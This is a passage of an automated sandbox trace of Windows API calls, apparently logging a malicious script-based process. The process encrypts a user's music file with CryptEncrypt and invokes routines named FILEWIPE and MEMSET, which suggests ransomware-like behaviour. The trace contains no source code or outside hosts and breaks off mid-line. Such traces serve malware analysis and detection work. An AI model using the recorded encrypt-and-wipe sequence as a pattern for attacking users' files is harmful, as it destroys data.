RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.277] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.277] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.277] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0037.278] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0037.278] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.278] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.278] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.278] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.279] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0037.279] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.279] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0037.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.280] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da238, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da238*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0037.280] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.280] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.280] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.280] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.280] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.280] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.281] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.281] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0037.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.281] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x17317, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x17320) returned 1 [0037.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0037.282] CharLowerBuffW (in: lpsz="byte[95009]", cchLength=0xb | out: lpsz="byte[95009]") returned 0xb [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.284] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0037.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.286] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.286] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x963648*, pdwDataLen=0x6ae220*=0x17317, dwBufLen=0x17320 | out: pbData=0x963648*, pdwDataLen=0x6ae220*=0x17320) returned 1 [0037.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0037.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0037.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.287] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0037.289] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.289] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.303] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.303] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.303] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.303] CryptDestroyKey (hKey=0x7c2200) returned 1 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.303] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.303] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.303] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.304] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.304] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.304] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.304] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.304] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.304] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0037.304] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.304] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0037.305] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0037.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af348 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.306] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.306] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0037.306] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa571aff0, ftCreationTime.dwHighDateTime=0x1d5ba57, ftLastAccessTime.dwLowDateTime=0x2c45c810, ftLastAccessTime.dwHighDateTime=0x1d5c5b9, ftLastWriteTime.dwLowDateTime=0x2c45c810, ftLastWriteTime.dwHighDateTime=0x1d5c5b9, nFileSizeHigh=0x0, nFileSizeLow=0x17317, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3lV09D8.m4a", cAlternateFileName="")) returned 0x7c2100 [0037.306] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.307] CharLowerBuffW (in: lpsz="byte[94999]", cchLength=0xb | out: lpsz="byte[94999]") returned 0xb [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.307] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17317) returned 0xaa0008 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.307] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.308] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.308] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.308] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.308] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.308] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0037.308] HeapFree (in: hHeap=0x770000, 